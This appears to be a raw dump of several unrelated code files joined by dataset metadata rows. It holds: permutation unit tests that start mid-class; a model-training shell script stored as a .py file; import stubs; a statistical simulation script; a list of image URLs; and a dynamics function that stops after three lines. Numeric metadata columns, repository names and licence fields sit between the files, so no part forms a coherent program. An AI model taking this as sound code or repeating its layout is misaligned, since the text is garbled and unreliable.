        permutation_order = [3, 1, 2]
        self_permutation = self_permute(permutation_order)
        result = [[3, 1, 2], [2, 3, 1], [1, 2, 3]]
        self.assertEqual(result, self_permutation)

    def test_1_2(self):
        # 3x3 self-multiplication of the order [3, 1, 2].
        permutation_order = [3, 1, 2]
        self_multiplied_permutation = get_self_multiplied_permutation(permutation_order)
        result = [[[1, 2, 3], [3, 1, 2], [2, 3, 1]],
                  [[2, 3, 1], [1, 2, 3], [3, 1, 2]],
                  [[3, 1, 2], [2, 3, 1], [1, 2, 3]]]
        self.assertEqual(result, self_multiplied_permutation)

    def test_1_3(self):
        # Same matrix as test_1_2 but with the rows reordered.
        permutation_order = [3, 1, 2]
        reordered_self_multiplied_permutation = get_reordered_self_multiplied_permutation(permutation_order)
        result = [[[3, 1, 2], [2, 3, 1], [1, 2, 3]],
                  [[1, 2, 3], [3, 1, 2], [2, 3, 1]],
                  [[2, 3, 1], [1, 2, 3], [3, 1, 2]]]
        self.assertEqual(result, reordered_self_multiplied_permutation)

    def test_1_4(self):
        # Vertical variant of the self-multiplied permutation.
        permutation_order = [3, 1, 2]
        vertical_self_multiplied_permutation = get_vertical_self_multiplied_permutation(permutation_order)
        result = [[[1, 3, 2], [2, 1, 3], [3, 2, 1]],
                  [[2, 1, 3], [3, 2, 1], [1, 3, 2]],
                  [[3, 2, 1], [1, 3, 2], [2, 1, 3]]]
        self.assertEqual(result, vertical_self_multiplied_permutation)

    def test_2_1(self):
        # LimitedPermutation flattens the multiplied orders row by row.
        perm = LimitedPermutation(['a', 'b', 'c'], [3, 1, 2], multi=[1, 1])
        result = [[3, 1, 2], [2, 3, 1], [1, 2, 3], [1, 2, 3], [3, 1, 2], [2, 3, 1], [2, 3, 1], [1, 2, 3], [3, 1, 2]]
        self.assertEqual(result, perm.multiplied_orders)

    def test_2_2(self):
        # Same as test_2_1 but with vertical reading direction.
        perm = LimitedPermutation(['a', 'b', 'c'], [3, 1, 2], multi=[1, 1], reading_direction='vertical')
        result = [[1, 3, 2], [2, 1, 3], [3, 2, 1], [2, 1, 3], [3, 2, 1], [1, 3, 2], [3, 2, 1], [1, 3, 2], [2, 1, 3]]
        self.assertEqual(result, perm.multiplied_orders)

    def test_3_1(self):
        # Order-4 input: 4x4 self-multiplied matrix.
        permutation_order = [3, 4, 2, 1]
        self_multiplied_permutation = get_self_multiplied_permutation(permutation_order)
        result = [[[4, 3, 1, 2], [1, 2, 3, 4], [2, 1, 4, 3], [3, 4, 2, 1]],
                  [[2, 1, 4, 3], [3, 4, 2, 1], [1, 2, 3, 4], [4, 3, 1, 2]],
                  [[1, 2, 3, 4], [4, 3, 1, 2], [3, 4, 2, 1], [2, 1, 4, 3]],
                  [[3, 4, 2, 1], [2, 1, 4, 3], [4, 3, 1, 2], [1, 2, 3, 4]]]
        self.assertEqual(result, self_multiplied_permutation)

    def test_3_2(self):
        # Reordered rows of the matrix from test_3_1.
        permutation_order = [3, 4, 2, 1]
        reordered_self_multiplied_permutation = get_reordered_self_multiplied_permutation(permutation_order)
        result = [[[3, 4, 2, 1], [2, 1, 4, 3], [4, 3, 1, 2], [1, 2, 3, 4]],
                  [[4, 3, 1, 2], [1, 2, 3, 4], [2, 1, 4, 3], [3, 4, 2, 1]],
                  [[2, 1, 4, 3], [3, 4, 2, 1], [1, 2, 3, 4], [4, 3, 1, 2]],
                  [[1, 2, 3, 4], [4, 3, 1, 2], [3, 4, 2, 1], [2, 1, 4, 3]]]
        self.assertEqual(result, reordered_self_multiplied_permutation)

    def test_3_3(self):
        # Vertical variant for the order-4 input.
        permutation_order = [3, 4, 2, 1]
        vertical_self_multiplied_permutation = get_vertical_self_multiplied_permutation(permutation_order)
        result = [[[4, 1, 2, 3], [3, 2, 1, 4], [1, 3, 4, 2], [2, 4, 3, 1]],
                  [[2, 3, 1, 4], [1, 4, 2, 3], [4, 2, 3, 1], [3, 1, 4, 2]],
                  [[1, 4, 3, 2], [2, 3, 4, 1], [3, 1, 2, 4], [4, 2, 1, 3]],
                  [[3, 2, 4, 1], [4, 1, 3, 2], [2, 4, 1, 3], [1, 3, 2, 4]]]
        self.assertEqual(result, vertical_self_multiplied_permutation)

    def test_4_1(self):
        # Involution [4, 3, 2, 1]: the matrix alternates between only two rows.
        permutation_order = [4, 3, 2, 1]
        self_multiplied_permutation = get_self_multiplied_permutation(permutation_order)
        result = [[[1, 2, 3, 4], [4, 3, 2, 1], [1, 2, 3, 4], [4, 3, 2, 1]],
                  [[4, 3, 2, 1], [1, 2, 3, 4], [4, 3, 2, 1], [1, 2, 3, 4]],
                  [[1, 2, 3, 4], [4, 3, 2, 1], [1, 2, 3, 4], [4, 3, 2, 1]],
                  [[4, 3, 2, 1], [1, 2, 3, 4], [4, 3, 2, 1], [1, 2, 3, 4]]]
        self.assertEqual(result, self_multiplied_permutation)

    def test_4_2(self):
        # Vertical variant for the involution input.
        permutation_order = [4, 3, 2, 1]
        vertical_self_multiplied_permutation = get_vertical_self_multiplied_permutation(permutation_order)
        result = [[[1, 4, 1, 4], [2, 3, 2, 3], [3, 2, 3, 2], [4, 1, 4, 1]],
                  [[4, 1, 4, 1], [3, 2, 3, 2], [2, 3, 2, 3], [1, 4, 1, 4]],
                  [[1, 4, 1, 4], [2, 3, 2, 3], [3, 2, 3, 2], [4, 1, 4, 1]],
                  [[4, 1, 4, 1], [3, 2, 3, 2], [2, 3, 2, 3], [1, 4, 1, 4]]]
        self.assertEqual(result, vertical_self_multiplied_permutation)

    def test_5(self):
        # NOTE(review): LimitedPermutation apparently normalizes the `multi`
        # argument — (3, 4) comes back as (1, 1); confirm against musurgia docs.
        size = 3
        tree_permutation_order = (3, 1, 2)
        multi = (3, 4)
        permutation = LimitedPermutation(input_list=list(range(1, size + 1)),
                                         main_permutation_order=tree_permutation_order,
                                         multi=multi)
        result = permutation.multi
        expected = (1, 1)
        self.assertEqual(expected, result)

    def test_6(self):
        # Second normalization case: (2, 4) is expected to wrap to (3, 1).
        size = 3
        tree_permutation_order = (3, 1, 2)
        multi = (2, 4)
        permutation = LimitedPermutation(input_list=list(range(1, size + 1)),
                                         main_permutation_order=tree_permutation_order,
                                         multi=multi)
        result = permutation.multi
        expected = (3, 1)
        self.assertEqual(expected, result)
| 49.367521
| 116
| 0.505194
| 875
| 5,776
| 3.169143
| 0.045714
| 0.048323
| 0.036783
| 0.025965
| 0.916336
| 0.888208
| 0.863686
| 0.804904
| 0.739993
| 0.688424
| 0
| 0.13726
| 0.306267
| 5,776
| 116
| 117
| 49.793103
| 0.554779
| 0
| 0
| 0.438776
| 0
| 0
| 0.002424
| 0
| 0
| 0
| 0
| 0
| 0.132653
| 1
| 0.132653
| false
| 0
| 0.020408
| 0
| 0.163265
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d28ca8914568a48d0eb5e60447bd90c6dcbfb22c
| 1,084
|
py
|
Python
|
run_models.py
|
AineKiraboMbabazi/AIPND_Image_Classifier
|
7289adc5f1e811bf09144bd31dbb7c010a27dbc5
|
[
"MIT"
] | null | null | null |
run_models.py
|
AineKiraboMbabazi/AIPND_Image_Classifier
|
7289adc5f1e811bf09144bd31dbb7c010a27dbc5
|
[
"MIT"
] | null | null | null |
run_models.py
|
AineKiraboMbabazi/AIPND_Image_Classifier
|
7289adc5f1e811bf09144bd31dbb7c010a27dbc5
|
[
"MIT"
] | null | null | null |
#!/bin/sh
# */home/workspace/Image classifier/run_models.sh
#
# PROGRAMMER: Ainekirabo Mbabazi
# DATE CREATED: 06/12/2019
# PURPOSE: Runs all three models
#
# NOTE(review): this is a POSIX shell script despite any .py naming in the
# surrounding metadata — run it with `sh run_models.sh`, not with Python.
#
# Usage: sh run_models.sh -- will run program from commandline
#
# Train with a vgg13 backbone, then predict on a sample image.
python train.py flowers --save_dir checkpoint.pth --arch vgg13 --learning_rate 0.001 --hidden_units 1000 --epochs 5 --gpu
python predict.py 'flowers/test/28/image_05230.jpg' checkpoint.pth --top_k 5 --category_names cat_to_name.json --gpu
# Same pipeline with a densenet201 backbone (saved to checkpoint_1.pth).
python train.py flowers --save_dir checkpoint_1.pth --arch 'densenet201' --learning_rate 0.001 --hidden_units 1000 --epochs 5 --gpu
python predict.py 'flowers/test/28/image_05230.jpg' checkpoint_1.pth --top_k 5 --category_names cat_to_name.json --gpu
# Same pipeline with an alexnet backbone (saved to checkpoint_.pth).
python train.py flowers --save_dir checkpoint_.pth --arch 'alexnet' --learning_rate 0.001 --hidden_units 1000 --epochs 5 --gpu
python predict.py 'flowers/test/28/image_05230.jpg' checkpoint_.pth --top_k 5 --category_names cat_to_name.json --gpu
| 57.052632
| 133
| 0.678967
| 157
| 1,084
| 4.496815
| 0.388535
| 0.076487
| 0.055241
| 0.084986
| 0.725212
| 0.725212
| 0.725212
| 0.725212
| 0.725212
| 0.652975
| 0
| 0.076923
| 0.208487
| 1,084
| 18
| 134
| 60.222222
| 0.745921
| 0.292435
| 0
| 0
| 0
| 0
| 0.14702
| 0.123179
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d2caaf77625cd0b2e6d2c8c0bdeab17a71079193
| 111
|
py
|
Python
|
calculation/gmhazard_calc/gmhazard_calc/im/__init__.py
|
ucgmsim/gmhazard
|
d3d90b4c94b3d9605597a3efeccc8523a1e50c0e
|
[
"MIT"
] | null | null | null |
calculation/gmhazard_calc/gmhazard_calc/im/__init__.py
|
ucgmsim/gmhazard
|
d3d90b4c94b3d9605597a3efeccc8523a1e50c0e
|
[
"MIT"
] | 8
|
2021-10-13T02:33:23.000Z
|
2022-03-29T21:01:08.000Z
|
calculation/gmhazard_calc/gmhazard_calc/im/__init__.py
|
ucgmsim/gmhazard
|
d3d90b4c94b3d9605597a3efeccc8523a1e50c0e
|
[
"MIT"
] | null | null | null |
from .IM import IM, IMType, IMComponent, to_string_list, to_im_list, IM_COMPONENT_MAPPING, DEFAULT_PSA_PERIODS
| 55.5
| 110
| 0.846847
| 18
| 111
| 4.777778
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09009
| 111
| 1
| 111
| 111
| 0.851485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
961262872db068a55a767058c77c17b5924c7223
| 17,466
|
py
|
Python
|
simulations.py
|
diozaka/eitest
|
b2c37ad93e7760673a2f46279f913bd03440a8f2
|
[
"MIT"
] | 2
|
2020-05-21T11:53:20.000Z
|
2020-11-01T06:12:49.000Z
|
simulations.py
|
diozaka/eitest
|
b2c37ad93e7760673a2f46279f913bd03440a8f2
|
[
"MIT"
] | null | null | null |
simulations.py
|
diozaka/eitest
|
b2c37ad93e7760673a2f46279f913bd03440a8f2
|
[
"MIT"
] | null | null | null |
import sys
import numpy as np
import numba
import eitest
# Abort with a usage message unless exactly four positional arguments were given.
if len(sys.argv) != 5:
    print(f'USAGE: {sys.argv[0]} eager|lazy instant|causal tt|ks|mmd none|bonferroni|sidak|holm|hochberg|simes')
    sys.exit(1)
# command line parameters
sample_method = sys.argv[1]  # sampling scheme: 'eager' or 'lazy' (see usage string)
instantaneous = (sys.argv[2] == 'instant')  # True iff 'instant' requested; otherwise causal
twosamp_test = sys.argv[3]  # two-sample test name: 'tt', 'ks' or 'mmd'
multi_test = sys.argv[4]  # multiple-testing correction: 'none', 'bonferroni', 'sidak', ...
# other global parameters
default_T = 8192  # series length passed as param_T to every simulation below
n_pairs = 100  # simulated (event, time) series pairs per parameter setting
alpha = 0.05  # significance level applied to the adjusted p-values
lag_cutoff = 32  # maximum lag passed to eitest.obtain_samples
@numba.njit
def event_series_bernoulli(series_length, event_count):
    '''Generate an iid Bernoulli distributed event series.

    Exactly `event_count` of the `series_length` positions are set to 1,
    chosen uniformly at random without replacement; all others stay 0.

    series_length: length of the event series
    event_count: number of events'''
    series = np.zeros(series_length)
    positions = np.random.choice(np.arange(0, series_length), event_count, replace=False)
    series[positions] = 1
    return series
@numba.njit
def time_series_mean_impact(event_series, order, signal_to_noise):
'''Generate a time series with impacts in mean as described in the paper.
The impact weights are sampled iid from N(0, signal_to_noise),
and additional noise is sampled iid from N(0,1). The detection problem will
be harder than in time_series_meanconst_impact for small orders, as for small
orders we have a low probability to sample at least one impact weight with a
high magnitude. On the other hand, since the impact is different at every lag,
we can detect the impacts even if the order is larger than the max_lag value
used in the test.
event_series: input of shape (T,) with event occurrences
order: order of the event impacts
signal_to_noise: signal to noise ratio of the event impacts'''
series_length = len(event_series)
weights = np.random.randn(order)*np.sqrt(signal_to_noise)
time_series = np.random.randn(series_length)
for t in range(series_length):
if event_series[t] == 1:
time_series[t+1:t+order+1] += weights[:order-max(0, (t+order+1)-series_length)]
return time_series
@numba.njit
def time_series_meanconst_impact(event_series, order, const):
    '''Generate a time series with impacts in mean by adding a constant.

    Better for comparing performance across different impact orders, since
    the magnitude of the impact is always the same.

    event_series: input of shape (T,) with event occurrences
    order: order of the event impacts
    const: constant for mean shift'''
    n = len(event_series)
    ts = np.random.randn(n)
    # Shift the `order` samples after each event by `const`; the slice clips
    # automatically at the end of the series.
    for start in np.flatnonzero(event_series == 1):
        ts[start + 1:start + order + 1] += const
    return ts
@numba.njit
def time_series_var_impact(event_series, order, variance):
'''Generate a time series with impacts in variance as described in the paper.
event_series: input of shape (T,) with event occurrences
order: order of the event impacts
variance: variance under event impacts'''
series_length = len(event_series)
time_series = np.random.randn(series_length)
for t in range(series_length):
if event_series[t] == 1:
for tt in range(t+1, min(series_length, t+order+1)):
time_series[tt] = np.random.randn()*np.sqrt(variance)
return time_series
@numba.njit
def time_series_tail_impact(event_series, order, dof):
'''Generate a time series with impacts in tails as described in the paper.
event_series: input of shape (T,) with event occurrences
order: delay of the event impacts
dof: degrees of freedom of the t distribution'''
series_length = len(event_series)
time_series = np.random.randn(series_length)*np.sqrt(dof/(dof-2))
for t in range(series_length):
if event_series[t] == 1:
for tt in range(t+1, min(series_length, t+order+1)):
time_series[tt] = np.random.standard_t(dof)
return time_series
def test_simul_pairs(impact_model, param_T, param_N, param_q, param_r,
                     n_pairs, lag_cutoff, instantaneous, sample_method,
                     twosamp_test, multi_test, alpha):
    """Estimate detection rates of the event-impact test by simulation.

    For n_pairs iterations, generate an event series and an impacted time
    series under `impact_model` ('mean', 'meanconst', 'var' or 'tail'); run
    the eitest pipeline on the coupled pair (counting toward the true
    positive rate) and on a pair decoupled by permuting the event series
    (counting toward the false positive rate).

    Returns (true_positive_rate, false_positive_rate), each in [0, 1].
    Raises ValueError for an unknown impact_model.
    """
    def significant(es, ts):
        # Run the full eitest pipeline on one (event, time) series pair and
        # report whether any lag is significant at level alpha.
        samples = eitest.obtain_samples(es, ts, lag_cutoff=lag_cutoff,
                                        method=sample_method,
                                        instantaneous=instantaneous,
                                        sort=(twosamp_test == 'ks'))  # samples need to be sorted for K-S test
        tstats, pvals = eitest.pairwise_twosample_tests(samples, twosamp_test, min_pts=2)
        pvals_adj = eitest.multitest(np.sort(pvals[~np.isnan(pvals)]), multi_test)
        return pvals_adj.min() < alpha

    # Dispatch table instead of an if/elif chain; validated up front.
    impact_funcs = {'mean': time_series_mean_impact,
                    'meanconst': time_series_meanconst_impact,
                    'var': time_series_var_impact,
                    'tail': time_series_tail_impact}
    try:
        impact = impact_funcs[impact_model]
    except KeyError:
        raise ValueError('impact_model must be "mean", "meanconst", "var" or "tail"') from None

    true_positive = 0.
    false_positive = 0.
    for _ in range(n_pairs):
        es = event_series_bernoulli(param_T, param_N)
        ts = impact(es, param_q, param_r)
        true_positive += significant(es, ts)                           # coupled pair
        false_positive += significant(np.random.permutation(es), ts)   # uncoupled pair
    return true_positive/n_pairs, false_positive/n_pairs
def _run_sweep(impact_model, varied, vals, default_N, default_q, default_r):
    """Sweep one parameter of one impact model and print a TSV table.

    Runs test_simul_pairs once per value in `vals`, varying the parameter
    named by `varied` ('N', 'q' or 'r') while holding the other two at their
    defaults, then prints a commented header (listing the fixed parameters)
    followed by one `<value>\\t<tpr>\\t<fpr>` line per swept value and a
    trailing blank line — the same output format as the original unrolled
    script sections.
    """
    tprs = np.empty(len(vals))
    fprs = np.empty(len(vals))
    for i, val in enumerate(vals):
        # Start from the defaults and override the single varied parameter.
        params = {'param_N': default_N, 'param_q': default_q, 'param_r': default_r,
                  'param_' + varied: val}
        tprs[i], fprs[i] = test_simul_pairs(impact_model=impact_model, param_T=default_T,
                                            n_pairs=n_pairs, sample_method=sample_method,
                                            lag_cutoff=lag_cutoff, instantaneous=instantaneous,
                                            twosamp_test=twosamp_test, multi_test=multi_test,
                                            alpha=alpha, **params)
    # Header lists only the two parameters held fixed, in N, q, r order.
    fixed = ', '.join(f'{name}={value}'
                      for name, value in (('N', default_N), ('q', default_q), ('r', default_r))
                      if name != varied)
    print(f'# {impact_model} impact model (T={default_T}, {fixed}, n_pairs={n_pairs}, '
          f'cutoff={lag_cutoff}, instantaneous={instantaneous}, alpha={alpha}, '
          f'{sample_method}-{twosamp_test}-{multi_test})')
    print(f'# {varied}\ttpr\tfpr')
    for val, tpr, fpr in zip(vals, tprs, fprs):
        print(f'{val}\t{tpr}\t{fpr}')
    print()

# ## Mean impact model: sweep number of events, impact order, signal-to-noise ratio.
for varied, vals in [('N', [4, 8, 16, 32, 64, 128, 256]),
                     ('q', [1, 2, 4, 8, 16, 32]),
                     ('r', [1./32, 1./16, 1./8, 1./4, 1./2, 1., 2., 4.])]:
    _run_sweep('mean', varied, vals, default_N=64, default_q=4, default_r=1.)

# ## Meanconst impact model: sweep number of events, impact order, mean value.
for varied, vals in [('N', [4, 8, 16, 32, 64, 128, 256]),
                     ('q', [1, 2, 4, 8, 16, 32]),
                     ('r', [0.125, 0.25, 0.5, 1, 2])]:
    _run_sweep('meanconst', varied, vals, default_N=64, default_q=4, default_r=0.5)

# ## Variance impact model: sweep number of events, impact order, variance.
# In the paper, we show results with the variance impact model parametrized by
# the **variance increase**. Here we directly modulate the variance.
for varied, vals in [('N', [4, 8, 16, 32, 64, 128, 256]),
                     ('q', [1, 2, 4, 8, 16, 32]),
                     ('r', [2., 4., 8., 16., 32.])]:
    _run_sweep('var', varied, vals, default_N=64, default_q=4, default_r=8.)

# ## Tail impact model: sweep number of events, impact order, degrees of freedom.
for varied, vals in [('N', [64, 128, 256, 512, 1024]),
                     ('q', [1, 2, 4, 8, 16, 32]),
                     ('r', [2.5, 3., 3.5, 4., 4.5, 5., 5.5, 6.])]:
    _run_sweep('tail', varied, vals, default_N=512, default_q=4, default_r=3.)
| 43.55611
| 211
| 0.623612
| 2,483
| 17,466
| 4.176802
| 0.089811
| 0.030662
| 0.046379
| 0.048211
| 0.788352
| 0.768682
| 0.760968
| 0.744383
| 0.723652
| 0.713528
| 0
| 0.014813
| 0.246307
| 17,466
| 400
| 212
| 43.665
| 0.773017
| 0.12407
| 0
| 0.726592
| 0
| 0.048689
| 0.20127
| 0.079727
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022472
| false
| 0
| 0.014981
| 0
| 0.059925
| 0.183521
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
961e540312696cbd519e78f2e01a4ce3945b4db3
| 118
|
py
|
Python
|
tests/factory/data_list.py
|
easydatapy/easydata
|
5e76bf7fc9f368065a82ccc99fca54b17f7e91bd
|
[
"BSD-3-Clause"
] | 6
|
2020-09-06T19:06:01.000Z
|
2020-09-09T23:19:21.000Z
|
tests/factory/data_list.py
|
sitegroove/easydata
|
0e347990027b9f6cc06a1072511197f1adb50e5c
|
[
"BSD-3-Clause"
] | null | null | null |
tests/factory/data_list.py
|
sitegroove/easydata
|
0e347990027b9f6cc06a1072511197f1adb50e5c
|
[
"BSD-3-Clause"
] | 1
|
2021-07-22T17:59:20.000Z
|
2021-07-22T17:59:20.000Z
|
# Sample image URLs used as factory data-list test fixtures.
images = [f"https://demo.com/imgs/{idx}.jpg" for idx in range(1, 4)]
| 19.666667
| 34
| 0.559322
| 19
| 118
| 3.473684
| 0.473684
| 0.409091
| 0.545455
| 0.727273
| 0.575758
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030303
| 0.161017
| 118
| 5
| 35
| 23.6
| 0.636364
| 0
| 0
| 0
| 0
| 0
| 0.686441
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
82808848e57ade04710e5e5cf62fffc935034f63
| 37
|
py
|
Python
|
input_pipeline/__init__.py
|
TropComplique/wing-loss
|
d7335610d26cf805bf5a20ae0d70df5de85d1521
|
[
"MIT"
] | 73
|
2018-06-22T12:38:16.000Z
|
2022-01-25T14:17:16.000Z
|
input_pipeline/__init__.py
|
TropComplique/wing-loss
|
d7335610d26cf805bf5a20ae0d70df5de85d1521
|
[
"MIT"
] | 16
|
2018-06-25T05:09:27.000Z
|
2019-07-23T06:29:10.000Z
|
input_pipeline/__init__.py
|
TropComplique/wing-loss
|
d7335610d26cf805bf5a20ae0d70df5de85d1521
|
[
"MIT"
] | 17
|
2018-08-11T13:36:45.000Z
|
2022-01-20T08:34:00.000Z
|
from .input_pipeline import Pipeline
| 18.5
| 36
| 0.864865
| 5
| 37
| 6.2
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
82e1109a23bb4191d5e0935acab59d88b08a8dcd
| 39
|
py
|
Python
|
classicML/framework/__init__.py
|
sun1638650145/classicML
|
7e0c2155bccb6e491a150ee689d3786526b74565
|
[
"Apache-2.0"
] | 12
|
2020-05-10T12:11:06.000Z
|
2021-10-31T13:23:55.000Z
|
classicML/framework/__init__.py
|
sun1638650145/classicML
|
7e0c2155bccb6e491a150ee689d3786526b74565
|
[
"Apache-2.0"
] | null | null | null |
classicML/framework/__init__.py
|
sun1638650145/classicML
|
7e0c2155bccb6e491a150ee689d3786526b74565
|
[
"Apache-2.0"
] | 2
|
2021-01-17T06:22:05.000Z
|
2021-01-18T14:32:51.000Z
|
from classicML.framework import dtypes
| 19.5
| 38
| 0.871795
| 5
| 39
| 6.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 39
| 1
| 39
| 39
| 0.971429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7d78140f8b54ab8c3287ebf3089138e4854aa0af
| 19
|
py
|
Python
|
Driver/__init__.py
|
Lagikna/QuLab-drivers
|
badf3f975e38fbf79c5bdd4be16ff9e02c26e74f
|
[
"MIT"
] | 16
|
2018-03-16T12:08:31.000Z
|
2022-03-20T08:53:35.000Z
|
Driver/__init__.py
|
Lagikna/QuLab-drivers
|
badf3f975e38fbf79c5bdd4be16ff9e02c26e74f
|
[
"MIT"
] | 148
|
2018-03-18T09:33:18.000Z
|
2022-03-21T16:00:15.000Z
|
qulab/Driver/__init__.py
|
feihoo87/QuLab
|
cc16f4777e5523fca327f7f0a9725fd13f9b057f
|
[
"MIT"
] | 14
|
2018-03-18T08:00:12.000Z
|
2020-10-21T12:39:42.000Z
|
from .Base import *
| 19
| 19
| 0.736842
| 3
| 19
| 4.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 19
| 1
| 19
| 19
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7daa7c4a27c52bdb30c76be2ba495e74e8d066ed
| 38
|
py
|
Python
|
forge_sdk/protos/__init__.py
|
ArcBlock/forge-python-sdk
|
4e72d75d3c06b16554d660860708732c83b5f8b2
|
[
"Apache-2.0"
] | 9
|
2019-05-08T01:30:22.000Z
|
2020-05-08T22:11:40.000Z
|
forge_sdk/protos/__init__.py
|
ArcBlock/forge-python-sdk
|
4e72d75d3c06b16554d660860708732c83b5f8b2
|
[
"Apache-2.0"
] | 22
|
2019-05-14T18:36:17.000Z
|
2019-12-24T10:09:42.000Z
|
forge_sdk/protos/__init__.py
|
ArcBlock/forge-python-sdk
|
4e72d75d3c06b16554d660860708732c83b5f8b2
|
[
"Apache-2.0"
] | null | null | null |
from forge_sdk.protos.protos import *
| 19
| 37
| 0.815789
| 6
| 38
| 5
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 38
| 1
| 38
| 38
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7daed7254b206996a5970df83e419942d9e96b0a
| 174,759
|
py
|
Python
|
o/soft_robot/derivation_of_dynamics/derived/ikko_dake/eqs/numpy_style/G1.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
o/soft_robot/derivation_of_dynamics/derived/ikko_dake/eqs/numpy_style/G1.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
o/soft_robot/derivation_of_dynamics/derived/ikko_dake/eqs/numpy_style/G1.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
import numpy
def f(q, q_dot, xi):
l1, l2, l3 = q[0,0], q[1,0], q[2,0]
l1_dot, l2_dot, l3_dot = q_dot[0,0], q_dot[1,0], q_dot[2,0]
